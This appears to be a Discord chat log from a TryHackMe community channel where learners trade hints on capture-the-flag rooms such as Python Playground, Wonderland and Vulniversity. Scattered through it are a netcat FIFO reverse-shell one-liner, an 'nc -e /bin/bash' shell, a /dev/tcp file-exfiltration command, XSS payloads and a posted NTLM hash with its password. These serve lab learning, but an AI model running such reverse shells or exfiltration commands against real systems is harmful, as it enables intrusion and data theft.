#room-hints

Hello everyone I need some of your advice completing this room https://tryhackme.com/room/crackthehash I managed to complete the first 3 hashes pretty easily using Johnm but i'm stuck on the 4th one (bcrypt) I'm running a Kali VM and this command has been running for 12 hours john hash2.txt --wordlist /usr/share/john/rockyou.lst -rule=single --format=bcrypt
Im just wondering if the task it self it's supposed to take that much time or if I'm doing something wrong

Shrink your input space

And it'll be slow if your hardware is.

You can get a good 100 H/s on CPU or GPU

okay.. I really need some knowledge on re
@indigo ridge i would suggest you to do the rooms Reverse Engineering, Reversing ELF, Intro to x86-64 and radare2 before even touching bof1 room..

@stuck fractal Yeah my machine only has 2gbs of ram and 2 cores for processing could that be an issue?¡

I could try running Kali as a bootable USB instead of a VM so I actually use all my hardware

You can run hashcat or John on the host

Rather than in a VM

Filter the input to 4char passwords or bruteforce

Sorry I'm kinda new, how could I filter the input?

Can't seem to find an option with john --help

You will need to use a different tool

pw-inspector will do it

Thanks buddy

I will also try brute forcing with hashcat and see how it goes

I'm having a bit of a time finding the answer to question 8 in the Investigating Windows room. Question is "What port did this file listen locally for?" I've looked through the powershell scripts to see if there were any designated ports and also through event logs and pfirewall logs to see if anything was captured but I'm getting nowhere. Any help is appreciated.
@hexed moat

Anyone have the answer for CC: Pen Test Section 5 question 6? I have spent an hour running sqlmap but the network is so slow that the machine crashes before It dumps the database

Anyone have time for help on 'Hacking with Powershell'. Some questions I do not understand what answer is expected

Anyone have the answer for CC: Pen Test Section 5 question 6? I have spent an hour running sqlmap but the network is so slow that the machine crashes before It dumps the database
@boreal yacht It shouldn't take that long, are you sure you're doing it right?

@white salmon I'm running sqlmap -u IP --dump-all --forms

From memory that should be fine.

It's a while since I did that part.

Mind if I DM you?

Thats fine

Sorry to bother everyone, I'm running the beginner course and I'm at flag 5 of the linux challenges. I think I know how to use find but the problem I'm having is that it's printing a huuge list of permission denied. So much so that it doesn't even list the whole thing and I can't manually find what i'm looking for from the list. I've tried " find / -name flag5 2>dev/null" but it still prints the whole list.

Is there any chance someone could point me in the right direction?

your missing a / in dev/null shouldnt it be 2>/dev/null ?

I havent been thru it , just looking at your command line

Oh sorry I mistyped there, I did put the / in there when I ran it

ok

Show a screenshot?

Sure, one second

Hmm it's not actually printing anything now for some reason, does this mean i'm not permitted to access the file?

It means find can't find it

You can't list the contents of a dir if you don't have X on the dir

So you can maybe try switching user

Ahh thanks, I'll try that now

Hmm couldn't find it in the other user either

The hint just says to use the find command

aaa pls hint on hatter in wonderland privesc

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md

I'll keep linking it, because it's really good

aaa pls hint on hatter in wonderland privesc
@white salmon basic enumeration

I think you might do something better with the time than wasting it in asking riddles that have no answers.

kekw 😂

james what is that ?

It's a guide

That talks you through a bunch of privesc methods

im looking at it rn

its kinda long :joy :

ooo it even has a checklist

I've tried piping it with grep but I still can't find it 😦

Oh nevermind! "find / 2>/dev/null | grep flag5" did the trick

I’m currently working on the introductory research room and I am stuck on the question
“If I wanted to exploit a 2020 buffer overflow in the sudo program, which CVE would I use?” I have searched the tag “buffer overflow” in the exploit database and all 3 results that are in 2020 have no CVE. I’m not looking for an answer just a nudge in the right direction

You're searching the wrong thing 🙂

Oh actually, are you getting the CVE from the text at the bottom of the page?

@proper temple It's sneaky. The vulnerability was discovered in 2019, but released in 2020

I’m accessing the database through google chrome and the CVE is at the top of the screen(well in my scenario it is appearing as N/A) I could send a photo to better explain if you wish?

CVE numbers are given on discovery

Not on release

Ah okay that makes much more sense

in the room Injection any hints for last "task5" ?

use find command

ha ha @glossy basin thank you i didn't see the hint would hav saved me some time .. tnx.

nice

Please remove spoilers. And it’s not working because you’re not the correct user. @north moat

can i dm @wraith marsh

No, there’s enough help in here.

what mean spoiler ?

Things that spoil the room for other people. Answers, flags, solutions.

Anything you worked for that other people might want to figure out for themselves.

advent of cyber is out of service? Cause I have been waiting like 10 minutes but the first task is not getting ping

not every box responds to pings

just scan it with the ping check skipped (-Pn)

I'm stuck at the last task of the pepega box , can anyone help ?

@rotund skiff Hi, i saw you was asking what 2> /dev/null meant. i solved task 43 for learning linux thanks too you. 2> is just a way of forwarding everything that went wrong. typing > is the same as typing 1> where 1 is stdout (standard output) and if you type 2> you forward every stderr (standard error) towards the destination you typed /dev/null. It's just a way of handling errors. If this didn't make it any clearer. read about standard streams 🙂 (also sent this over DM)

@wraith marsh thanks finally i got root wonderland 🙂

also sent this over DM
While I was not the person that you dm'ed, I ask you that you please read rule 1 in #rules 🙂

not every box responds to pings
@wooden mist i forgot the vpn #facepalm

My bad

Didn't know 🙂

It's fine, now you do 🙂

Yes, thanks 😄

Task 20 #9 in ccpentesting is basically impossible because it doesn't tell you which order to put the options in

in ignite room i got ||python sccript but when running commands i is shown in raw html|| any idea how to fix this ?

Hey all, could I please get a tip for Linux Challanges Task 5 flag 33 - I've checked

||/usr/local/bin
/usr/local/sbin
/usr/bin
/usr/sbin||
etc i can't see it :/

@surreal kite try reading this: https://opensource.com/article/17/6/set-path-linux

@surreal kite you can ask me here anything you like 🙂

@warm schooner that's a lot more than a hint

Like. A lot.

I shall delete

DM me if you want some help at this point

maybe use shell instead of binary :/

@stuck fractal May I DM you? (Need some help in wonderland)

No@tardy beacon

Okay, no worries. Thanks.

🙂

hey I think I got command execution from teaParty.. but the command is running as rabbit.. so what should I do.how make it to hatter

Then you haven't done it right

☹️ .. i used ||bof|| in it and then the command get executed in next line..is it right?

Look very closely at the code

i used ghidra.. and saw the c code.. only main function

Yep. Ghidra/Cutter will give you more or less the exact source code

Understand what's happening, and you'll understand why it doesn't work

I think it is related to date time thing.. ?

Don't ask. Do.

Try things

okay

Depends what stage you're at

Ps he wrote the box

did I miss something on wonderland. I was able to access another user's directory to run a binary as the initial user on Friday, but now it is blocked today?

@torn mural That was a bug

gotcha, so I need to priv esc to that user that has the binary?

You need to privesc everywhere

@white salmon Don't spoil the box.

It's a huge spoiler

You can rephrase the question to be more generic

@ripe hedge No they literally dumped the method in here

Ah ok

You were quick on the delete then

@stuck fractal is it okay to DM? To explain my previous message

@warm schooner yup

Is there anyone that can give me a nudge on the third flag in Python Playground?

Hello, I am currently on "xss" box,
On task 8, challenge 2
I have successfully popup alert, but the key is not shown
(as mentioned by NinjaJc01, it is a known issue)

Input value || <IMG SRC="/" onerror='aler&#x74("Hello");'> ||

Any hint to solve the challenge in other way would be much appreciated. 🙇‍♂️

Take a look at the reference material

There's a cute bypass on one of them

Any chance I could get the smallest nudge on flag2 for PythonPlayground? been looking for about 3 hours now

🤔

do you have the creds?

Ah, thanks Hydragyrum. Managed to solve it. 🥳

3 and 4 are looking for something very specific, I haven't found it yet

do you have the creds?
@wooden mist Nope, only user. Can I DM for a sanity check?

I think I know the username, but no idea where the pass is 😄

3 and 4 are looking for something very specific, I haven't found it yet
@ripe hedge For challenge 3 and 4, somehow I manage to retrieve the flag without actually printing "Hello"

I got the xss in 10 different ways with no flag

Then for challenge 3 and 4,

Injecting || <img src="." onmouseenter=alert("Hello");> ||

Gives me success = true, even though it pops up nothing.

I ...did that

Without the || "."|| Though

I'll try tonight

Debugging unit tests now...

any hints on python playground

(not funny)

elf

did you finish kenobi?

Yeah good luck elf

no

finish kenobi

i cant i dont have mount

GL Elf

ty

ninja sent you the required package yesterday

uh

This is the hardest box I've done so far I think

5 sec 😂

Couldn't get anything to return on Gobuster for Python Playground lel

5 wordlists later

I found the playground, but the blacklist seems to hate me

Check the gobuster parameters, there's a crucial one.

👀

I'm still trying to get creds for 3/4 hours :/

||don't check for directories||

||check for file types instead?||

Do you need to know the hash value as you already have the window.location?

🙊

A friend told me that it's important, I'm on that phase as well @warm schooner

lmao that's cool

Because I hate JS I might just throw hydra at it 😁

Yeah, the JS is annoying

A friend told me that it's important, I'm on that phase as well @warm schooner
@tidal sedge hard to identify

I'm giving up for now, if it is that, i hate no idea where to start 😬

Oh it's a custom hash, just have to reverse the JS

Yeah

But I hate JS 😁

I could just try to reverse the order that it's hashed in but hydra sounds more fun 😛

lmao hydra

Flag 3 hint? 🥺

Any hints for Hacktivity- Learning Linux, Task-21?
I am not getting what is to be done

use what you learned in 18

what are we supposed to do in this task I am confused about that. Do we need to create a file for checking environment variable values or is there some file already present which we need to run to find password like task 11

no just create the environment variable

The latter

Just make sure you're in the right home directory

@hazy thorn Create thing, run binary, get password

Make sure you're in your home directory

Yeah that

@warm schooner you mean extensions ?

Mean the same thing

its not working tho 😭

@white salmon ||You are searching for the wrong extensions.||

ty 😂

oh

i found it

wow

WOW

this is kinda funny actually

Finding the page is the ez bit haha

i liturally don't know how to do this lol

Is Python Playground rated hard because of flag3? Because I'm lost and in hindsight the first two flags were not that much more difficult than other rooms that are rated medium or less. I could need a hint.

lol im still stuck at getting the first flag

o.O

ive been staring at privesc all day now

o.O

ive been staring at privesc all day now
@spiral stag I’ve been the same for creds 😭

😄

@wraith marsh i think i alredy figured out how to get the creds

Oh ffs. I think I know what’s needs to be done, just no idea of the how

@white salmon @ripe hedge @stuck fractal I created test1234 as env var and assigned it $USER but on running binary it gives ```cat: /etc/shiba/shiba3: Permission denied

no creds needed for 1st flag tho

python playground @wraith marsh

no creds needed for 1st flag tho
@spiral stag I got flag1 🙂

ah ok

Python ||read directory? Guessing /home/connor/||

i don't 😦

im stuck at ||admin||

Python ||read directory?||
@warm schooner || ganstas pop shells || 😂

w00t w00t

Couldn't get an rs to work

||plz hint||

The playground returns security threat when trying to do an rs

not always 😮

@hazy thorn Terminate and redeploy, you broke the binary

The playground returns security threat when trying to do an rs
@warm schooner try a different approach I got a full tty 😀

please hint on ||admin.html login page idk how to deal with the hash thing||

linear operations

@white salmon its all there

@lusty wigeon i don't know math.

lol

that sucks

YES

no math needed tho

||when i saw the sc i was like tf do i do||

RE it

REEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE

idk how smh

like i understand what you mean

https://tenor.com/bjP0z.gif

but i don't know how to make it in python

I’m pretty lost there too 😂 given up now

i don't even understand js

Huge spoiler: Use python 😄

wow ty sherlock 😂

use python for what

@hazy thorn Terminate and redeploy, you broke the binary
@stuck fractal Thanks got it now👍

to re hash? @wooden mist

ah, anything would work tbh

i just did it in js

idk how to do it tho :Joy:

use cython

python++

i can use c then lol

Python#

python bad slow

its still not helping me how to do this tho

https://tenor.com/view/missy-elliott-work-it-iput-my-thang-down-flip-it-and-reverse-it-holla-gif-16657256

REEEEEEEEEEEEEEEEEEEE

i know what i have to do but i don't know how to do it..

this is so alme

lame

thats how i feel aswell

😂

but still even if i figure it out im gonna do it in c cuz i want to practise it

Trying RS, pty and reading directories, all return security threat

Gonna try to obfuscate some python

Think about what could be causing the error

internet?

The playground doesn't seem to like ||imports||

pebkac

pebkac
@spiral stag What about standing desks?

we have a winner, he beat the system

congrats

a pebkac error cannot occur by definition if the user is standing

how can I exploit absolute path variable in system call

in c

Rule 13

i searched.. I found out only relative path could be exploited

You need to privesc everywhere
@stuck fractal Just finished. Great room!

@indigo ridge Then there's your answer

anyone know learn linux task 43
how to find password for nootnoot

any hints on how to research for the root step on vulniversity? I am supposed to get advantage from the || SUID bit of /bin/systemctl || to get root, but I have no idea what to put in the web search form.

Try exactly that. What you just put as a spoiler, research that

Gtfobins is a great resource for that kind of privesc

anyone know learn linux task 43
how to find password for nootnoot
@cold tulip You can find a youtube video about it

@cold tulip also ask on one channel before spamming on the others

@cold tulip also ask on one channel before spamming on the others
@oblique cliff okay dude got panicked 😆
sorry

Np now you know 🙂

@cold tulip You can find a youtube video about it
@white salmon well it doesnot show the reason

i want the reason

for searching in the specific file

or dir

thank you!!!

Gtfobins is a great resource for that kind of privesc

@cold tulip the walkthroughs will show you what to do and some/most will explain why

thank you!!!
@grand rune this is some site?

google it

gtfobins.github.io

@cold tulip the walkthroughs will show you what to do and some/most will explain why
@oblique cliff where can i access these walkthrough

youtube dont have these

!writeup zthlinux

i mean informative one

That's very informative

In rooms there’s always a walkthroughs tab

poor ol' muirl

Brutal

and how to get verify

we have to put token in <>?

DM the tryhackmebot using !verify and your token from your profile

nope, replace the brackets <> with your token

DM the tryhackmebot using !verify and your token from your profile
@steady stratus You dudes are greatttt

Just to confirm the obvious because I have no entrypoint at all so far... Is flag3 on Python Playground a Python related privesc? 😄

@white salmon Thanks for the tip, the room is definitely buggy

Just to confirm the obvious because I have no entrypoint at all so far... Is flag3 on Python Playground a Python related privesc? 😄
@potent vale I dont think so, but still stucked on second flag so dont know really

Anyone have some hints on python playground? I managed to get the first flag but the second flag got me stuck for hours...

Did you check the hint at the second flag already?

Anyone have some hints on python playground? I managed to get the first flag but the second flag got me stuck for hours...
@limber quarry same here

Hint is pretty good, i knew what i had to do shortly afterr

@white salmon @limber quarry pm me

Comming

any hints on geting root on python playground

stuck at the same place

when i try to upload php-reverse-shell.phtml in vulniversity, then it says this message:

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)

any help?

You weren't listening properly

sudo nc -lvnp 1234

is that not right?

check your host firewall rules?

@viscid egret Are you attacking from a kali VM?

no

Did you correctly edit the reverse shell?

Correctly meaning putting your VPN IP in there

oh i got it

ufw is annoying

thx ajacajc

yes!

This is why we use kali

in room: Injection | Task 5 | #1 i cant get reverse shell from the os injection why !

@random wraith https://www.youtube.com/watch?v=53zkBvL4ZB4

okey @solemn smelt

i tried to get a reverse shell using nc -ip -p -e /bin/bash

but i get nothing can't figure what exactly is the issue

did you setup your netcat listener on your attacker machine

yea sure

thats a yes or no, not sure?

yes

are you running the vpn on the vm or your host

on my host

it needs to be on your vm or the reverse shell will not work

you mean the vpn config of THM ?

yes

nah thats running on my vm

is running on my kali vm

i already completed the room but still the root flag which needs r****** sh***

did you set the ip and port in the command it seems you didnt from what you posted

yea i set the ip and port

did you use your tun0 or eth0 ip?

tun0

what port

5555

i listen with : nc -nlvp (vpn ip) (port)

are you sure thats the right exploit to use?

connect with : nc (vpn ip) (port) -e /bin/bash

well i think so its an os injection

that doesnt mean the web server is vulnerable to that I would enumerate more because you more than likely arent using the right exploit

oh well alright

thanks for ur help

@random wraith Which room is this?

Because nc -e very rarely works

in room: Injection | Task 5 | #1 i cant get reverse shell from the os injection why !
@random wraith i used perl reverse shell, others dont work for me

@inland onyx os Injection

released 1 week ago

Yeah, don't use nc -e

Try other reverse shells

@white salmon thanks

I reckon mkfifo /tmp/f; cat /tmp/f | /bin/sh 2>&1 | nc <tun0-ip> <open-port> > /tmp/f would work. I used that, from memory

If perl works, for for it

@white salmon thanks
@random wraith other way works for me was upload php reverse shell

@inland onyx oh alright gonna try that ty

That should be your go-to netcat reverse shell for Linux, by the way -e works on precisely one version of netcat, and there are lots of versions

A FIFO will nearly always work, if netcat is installed and the firewall allows

@inland onyx thanks those info are really helpful ❤️

Np 🙂

Hello, dumb question but, for the vulneversity gobuster question, I can't find the wordlists we are supossed to use, since I dont have the Kali Linux machine

No such thing as a dumb question

Dirb and Dirbuster wordlists can be found online

Kali is the best way forward if you're just starting out though

Thanks, I just cant pay for the subscription atm, and my terminal is linux, so it all works out, I just didnt know the wordlist names

Appreciate it

lmao really?

@white salmon This channel is for room hints.

Can i get a hint for flag3 on Python Playground ?

can i please get a smol nudge for flag2 on python playground?

@frosty inlet look at the source code...

anyone knowing this hash ||(dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu)|| python playground ?

Well thats not actually a hash @sick sun

need hint to get some creds on python playground

read the code

I need some help on python playground privesc, I keep banging my head on ||mtr-packet|| but im not sure that's the way

if not, then im even more lost 😒

it's not

😮

||look at / closely||

its obviously something i've never seen or done before :/

@wooden mist ||dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu|| <- that is my stuck

look at the source code closely

???

@wooden mist im stuck to get creds in flag2 bro

I know, i just don't get your mesage about ||int_array_to_text||

analyze the code

and you should know what to do next

@wooden mist oke bro i was deleted it

please don't ping me each time you want to reply, I'll read the message either way

For python playground, is there an initial file or a directory that we need to find in order to get to the playground?

yes

alright

okayface, the only other thing i find is ||snap|| but that is a patched version

im so blind apparently

is there a thm room i should do to improve myself?

a room that'd help you with this one? i don't think there is one

:/

i should just let it go... but i cant 😦

||you probably missed a /|| if that makes sense

erm

im afraid it does not

i should go back?

👍

😮

awww yiss

that was nasty

ayyy

@wooden mist thanks for the help!

does the hint make sense now?

it does

kinda

i think

lol

mhm

weird that that works tho

mind DMing me with your method of getting a shell from the playground? I'm curious how people solved that part

yep

Python Playgrund - Any hints on how to progress once we reach the playground? Have tried: RS, pty and directory enumeration. Need to look into python exploits

Just write some python, but think about what you can't do. and try doing it a different way

some python

^

You'll kick yourself when you get it

Seems to bork with imports

I bet

think of ways to bypass that

^

||hardcode instead of importing?||

eehhhh no

I mean it might work

idk

¯_(ツ)_/¯

If there just was a list of functions that you can use without importing stuff in Python

I'm going to be spending all day on this stupid || JS ||

The RE does not seem fun

I don't even know where to start 🤷‍♂️

From the bottom

@wraith marsh you start with reading the code

@wraith marsh you start with reading the code
@wooden mist I've done that, and tried several things and just get junk

Will do

Help with Room Injection Task#3 Question 1

I tried all I can, tried all the ping commands.

From the bottom
@potent vale Started from the bottom now we here

You know what to do I guess, just not how. I don't know how to give a hint without providing the source code which is not going to happen 😉

If you don't know where to start "from the bottom" is the obvious answer in that task

Can I ask a question for a hint including my potentially spoiling approach here in a spoiler tag?

I could need a slight hint here, i am doing common linux privesc and am doing task 4: Q6. What critical file has had its permissions changed to allow some users to write to it? The hint says, think about where passwords are stored on linux. A slight hint on what i am missing?

Solved it but would argue the answer is wrong for what the hint is pointing towards 🙂

Finally got flag3 on Python Playground. Thanks for the hints 👍

I'll have to check out future writeups on this one if there are other ways to claim flag1 and 3

some hint on hatter to root please..

@indigo ridge ||linpeas||

thankyou every one.. and the creator of the wonderland room. @stuck fractal after so many attempts I just rooted the box . I learned a lot.. phewwwww!!!

@indigo ridge ||linpeas||
@potent vale thanks brother!!

What type of DNS server contains records specific to domain extensions (i.e. .com, .co.uk, etc)? Use the long version of the name.

I looked everywhere but couldn't find anything

any help :)

anyone at all?

https://ns1.com/resources/dns-types-records-servers-and-queries

@bitter shadow

I read it 3 times now

I mean it's in the room

ok

I still can't find it

in that link i sent it says there are 3 types of dns servers

its one of the three

omg finalllly

thanks

Hey guys. Im struggling with Hackpark. im on task 3 - trying to gain a reverse shell on this system. I have openened a netcat listener. I have uploaded the Postview.ascx file on to the webserver. The navigated to the directory listed on the CVE but i get an error.

any ideas where i am going wrong? any hints / tips?

i have also followed the video walk-through and followed the steps exactly and still get the above error.

looks like it was a school boy error on my part 😦 I entered the IP of Hackpark on the aspc file instead of my Kali machine and so NC could not listen.

Now working 🙂

good cuz i was trying to figure out what you might be doing wrong lol

Hackpark is only available for 1 hour....so so annoying and frustrating. Even when you try to extend the webserver stops responding.

Known issue

Speed run the box

JackOfAllTrades, is there something I'm missing? I assumed you'd be able to ||log in either to the web server or ssh with the password found in the page source and username being either Jack, jack, Johny, Johnygraves|| but none of those work

Nope, keep looking

||oo found it thanks except now idk how thats encoded||

😛

If you get very stuck with the encoding, go search up the name you found before

Most people skip that, but there's a hint there

ah poop shoulda done that

thanks yu

Hey, anyone able to help me with a room/linuxctf question?

real simple flag probably but im not sure what to look at for Flag 7

@tepid mist which room?

https://tryhackme.com/room/linuxctf

google for how to find the process list and then grep that for a keyword

it should jump out at you then

nothing

well there's switches on the ps command to make it show you more info

hmmm, to the man page

happy hunting

thanks ❤️

Quick question for my own, is there anything in linpeas that would help with flag3 of the Python Playground, I have gone through it more than once and it's starting to blur in front of my eyes 🙂

@median compass there is not

@median compass found it when i used BSD syntax

cheers @spiral stag

nice one @tepid mist - 'ps -aef' will usually find anything there is to be found

thanks for your help

very welcome

hmm, ||got that the hint is the stego image on the webpage for the user, but the user isnt the name of the dino itself and theres nothing in strings in the image|| any other hint for jackinthebox?

Who said it's in the stego image?

ok i append to i dont see anything in any of the images 😦

Y'sure?

Keep trying that

i dont have too much experience with stenography, is there other stuff i should be doing to explore the images?

besides strings

Steg tools

@oblique cliff this guy has a good resource of tools https://0xrick.github.io/lists/stego/

oh, cool. thanks yall

Could someone give me a hint on python playground root. Have been stuck for hours and have no idea where to even start anymore

@sinful garden pm

yea thats fine

@rancid crystal Hey there 🙂 question if the answer for Room "Google Dorking" Task 3 Question 3 is working ? my answer of ||85/100|| is not being accepted? 😦

@surreal kite Your score is wrong

@stuck fractal am i missing something here?

@steady stratus

Sorry about that. I’ll fix the question when I get back from work in a few hours (probably completely rewrite it tbh) @stuck fractal @surreal kite

Of these addresses two are reserved, what is the first addresses typically reserved as?

https://tryhackme.com/room/bpnetworking

It is currently expecting 83/100 @surreal kite

what type of answer is he expecting tho?

I tried everything

task 1 question 8

i don't recall how i found out

but you know what the highest is for?

idk I tried ||gateway|| if that's what you're referring to

I also tried ||localhost||

ah ||gateway|| is close

but there is 1 before that

I tried ||router||

oh wait

wait what comes before a ||gateway||?

its not a device, its an address

and how its called

umm

there are 2 addresses you cannot assign in an /24 network

omfg

I got it

thanks

yawp

pls remove tho

dont post answers

yea just wanted to make sure lol

yea yea ik

lol

thanks

np gl!

Hello. Im at the last step of learning linux. And managed to find the user nootnoot and pw. Imbsuposed to find root.txt. But access denied on the root folder. Any hints? :)

check what nootnoot can do to escalate his privileges

man sudo

I think i got it!

Got it! Thanks for giving a rookie a tip =)

@steady stratus thank you

hey guys, i have been on the platform for a few weeks and noticed that i can do the learning linux easy rooms to boost my score (to irritate a friend with far less time than me) and i seem to be unable to input the answer to a question. i am 100% certain it is correct and have even googled answers for the room which agrees with me. any known workarounds? im on googledorking task2 question 2

nvm, just kept clicking submit

Somehow feel like I’ve been going round in circles with Python playground’s third flag. Any nudge is greatly appreciated

You should have noticed something if you enumerated when you got flag1. @thorny nest

Hey, does anyone solved the shodan.io room? I've solved everything exprect: "What is the 3rd most popular country for MYSQL servers in Google's ASN?" As shodan only shows 2 results, which are not the right ones. Searching the didn't do the trick...

Nope. Don’t recall seeing anything for flag1. Though i got flag2 prior to flag1. Hmmm will take a look again. Thanks @wraith marsh

Have a go at it, if you get stuck just ping me again 🙂 @thorny nest

Sure will do. Though I just might take a break. Been going round in circles.

Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh"

anyoe can help with this question?

how do i specify write permissions only for group others

hi all, what things can i do if i can create files as root on specific directory ?

you can do lots of things

is there a specific question?

yeap haha, python playground related.

you might want to run a file with root permission

i would suggest reading about suid

ok @covert basalt but the user dont belong to sudoers

i have suggested according to python playground

ok let me learn more about that topic, thanks @covert basalt

could someone help on room ice task 3 question one

i found the answer, it is Exec Code Overflow

but the thing doesnt want to accept it

i know its that because i got the cve number right

finally, got root on python playground, great box @viscid dust, very clever! tyvm

@viscid egret if you look at the asterisks, you'll see that what you think the answer is can't possible be the answer

hello guys

hm but i looked in the cvedetails site and that was the name

I'm on the RP. Metasploit

I hashdumped the hashes of the machine

got Dark's password,

please dont post ansswers

I know

oop sorry

what would be a longer version of the word exec @viscid egret

execute

maybe try that since its the right length as the answer suggests

thx

guys,

can I send a PM to somebody ??

just ask your question

I have a small query

it'll give answers

is it ok ?

you haven't even said what room it's about @rose moss

Read again

I said i'm in the RP. Metasploit

ah, big gap between first question and last, my bad

excuses

so,

I hashdumped the passwords

can mark it as a spoiler

I got the user password

|| like this || put 2 | on each side

but the root password || was a blank ||

I enabled the rdp

but ||could not connect with a blank, how come ||

||7c4fe5eada682714a036e39378362bab:Password01!||
||31d6cfe0d16ae931b73c59d7e0c089c0:||

@oblique cliff thanks for the trick

any ideas ?

who's ||Password01!|| for?

||for Dark||

I tried it and logged in,

yet for the root, nope

you sure thats the name of the user?

hey im now on question 12 where i have to exploit, but it keeps failing. any ideas?

||using bypassuac_eventvwr||

if youre following the steps exactly and youre sure then terminate and redeploy

yep did that already

it says to try multiple times

but output is the same

it seems to work but doesnt create a new session

||[] Started reverse TCP handler on 192.168.0.20:4444
[] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[] Configuring payload and stager registry keys ...
[] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[] Cleaning up registry keys ...
[] Exploit completed, but no session was created.||

thats all it says

@viscid egret your VPN IP isn't really sensitive data and it's harder for us to diagnose if you have the wrong IP set

i have it correctly set

there

Wrong ip set mate. It needs to be the vpn ip

Tun0

it says to set RHOSTS to the machine ip

thats what i set

Lhost needs to be tun0

yep it is

Which is the vpn ip

thats not my ip

That shows 192

thats the machine ip

It's not.

TryHackMe VMs have 10.10 ip addresses

oh yeah but i set RHOSTS to 10.10.101.73

and LHOST to my ip

10.2.17.239

LHOST needs to be your VPN IP

yes

it is

It's not listening on that address

Set it again

Key tip with msf sometimes it fails to set so setting it a couple times is usually a safe bet

ok yeah that fixed it

like 6 times

it did not want to set it

or possibly 18

thx

In burpsuite room i cant find a “good request” where set cookie is set in the response so sequencer Can calculate entropy any hints ?

Are you looking in the Response tab? @mild eagle

@hexed crescent yes the only one I. Can find is for socketxxx

Re-browse the login page with credentials, intercept through, and it should provide a Set-Cookie response entry.

@hexed crescent the only cookie i see in response i io

Set-cookie that is

Did you go through all the entries in Proxy > HTTP history?

Yes and there is a lot now @hexed crescent

One thing to try, in OWASP Juice Shop, is on the login page, create a new account, and login with that new account, that should get you the Set-Cookie response entry in Proxy > HTTP history > Response sub-tab for sure.

Hey guys, I am doing the networkservices, Exploiting SMB Part, I have managed to go into the smb client but I can't seem to view any of the files or look for the owner of the folder, any guidance would be great! Cheers (I have used the -help command but I don't seem to be getting anywhere with that as well)
https://cdn.discordapp.com/attachments/692456966802374687/720019671084171294/unknown.png

https://cdn.discordapp.com/attachments/692456966802374687/720019722950803477/unknown.png

I don't want the answer, just guidance on what to do next, been looking at this questions for nearly an hour

There is a document in there that stands out to me immediately.

You won't be able to view it you will need to download it.

Yeah, the Working From Home Information.txt file

@hexed crescent didn’t help strange

okay, I assume that is using get command?

Either that or mget *.

When I use either of those commands, i get this response
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Working

Ok so try mget *

That should allow you to choose with Y or N which files you want.

mate

I could cry

That should allow you to choose with Y or N which files you want.
@white salmon Thank you so much

Haha, no problem.

@hexed crescent I guess it is supposed to be the token cookie - but I don’t have a set-cookie response for that one

@wraith marsh mind if I DM you?

Yeah let me just turn them on

Go for it @thorny nest

Hello again, I am trying to ssh into a server using a private key however I am getting this returned to me:

I believed I didn't need the password due to the private key?

Which room is this?

Network Services

[Task 4] Exploiting SMB

#8
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

What is the smb.txt flag?

I could be wrong. But I think you need a different username

@paper glen Yep, as JB said, the username is wrong

Okay, thanks for that! Ill keep digging!

I think that one caught me out 😂

😭

Yes me too.

So I'm 99% sure I have got the right username now but once I change the file permissions for the id_rsa, it won't connect

you need to change the permission of the ssh key

It complains to you very clearly

He did

Look at bottom of the bit

Pic

I did that though? chmod 600 id_rsa

usernames are case sensitive

^

..

HAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHAHAHAHAHHA

Linux is case sensitive

Thank you all

It's done

https://tenor.com/view/frodone-its-done-hobbit-sad-gif-12946787

Working my way through the injection room and it asks where the user's shell is set as, does this just mean the directory it spawns in or am i missing something?

Where can you find that information?

There's a file, readable by everyone

👍

ty

Congrats @paper glen

Congrats @paper glen
@white salmon thank you!

any nudge on python playground, I got flag1 and I have a shell on the box

but not sure where the rest flags are

😦

Python shrugs

I'm sure somebody can though. :_0

Look at the hint on the room, you should have already seen what you need to do 😉

can i DM you @wraith marsh or @white salmon , I fear i might spill some info hear in the process of discussing

I don't use python so I doubt I will be any help to you. (thank you for asking first though)

Python playground is a new hard room @white salmon

Yeah you can DM me @white salmon

May I ask for any hint to get flag3 (Python Playground)?

I'm on the Linux challenge where I have to download an mp3 file to get the next flag. Is there any chance someone could give me a clue as to where I would find what port I should be connecting to?

How are you downloading it?

There are a tonne of different ways to do it

I'd be using netcat and /dev/tcp myself 🤷‍♂️

Oh sorry I should have specified, I'm using filezilla

Port 21 for FTP

It should do that by default though

Oh there's a method of doing it in-machine?

Not listening to it

Either way you'll need to exfiltrate it

FTP and SCP are the heavyweight options though

Oooh ok. Sorry but I have a couple more questions now :L So are there port numbers that are set universally on all machines for certain purposes?

Yes

The first 1024 are set strictly

https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers

RFC 1340 IIRC

Thanks James

I got u

Ahh I was googling all wrong then, I was trying to look for what ports are open

thanks james!

For a certain number after that, they're "reserved"

if that's right I'm gonna cry

LMAOO IT IS

After that, they're free to use

nmap -sV -v -p-

@steady stratus I am very impressed

But you have a sad, sad life

I know

It's actually tragic

What a weird party trick

So is there a way of exfiltrating the file from this challenge without using FTP or SCP?

Loads of them

HTTP, pure netcat, there's a bunch of ways

nc -lvnp 1234 on your own host

Ahhh interesting

cat <file>.mp3 > /dev/tcp/<your-ip>/1234 on the remote

That's my go-to just now

Brilliant, I'm going to go look in to these now

Really appreciate the help

Np 🙂

im currently doing the wgel

i did get the ||key ||but how to use it? ermmm... ||ssh -i file ip||?

If it's an id_rsa, maybe

ssh -i identity username@ip

owh.. im still lacks username maybe..

Guess you need to keep going then

yea thank.. i though im using wrong command for ssh

the RSA key authenticates you to the server, like a password would be better

You still need to say who you're connecting as

Assalmu ali kum to all

any hint on privesc on UltraTech

any hints ?

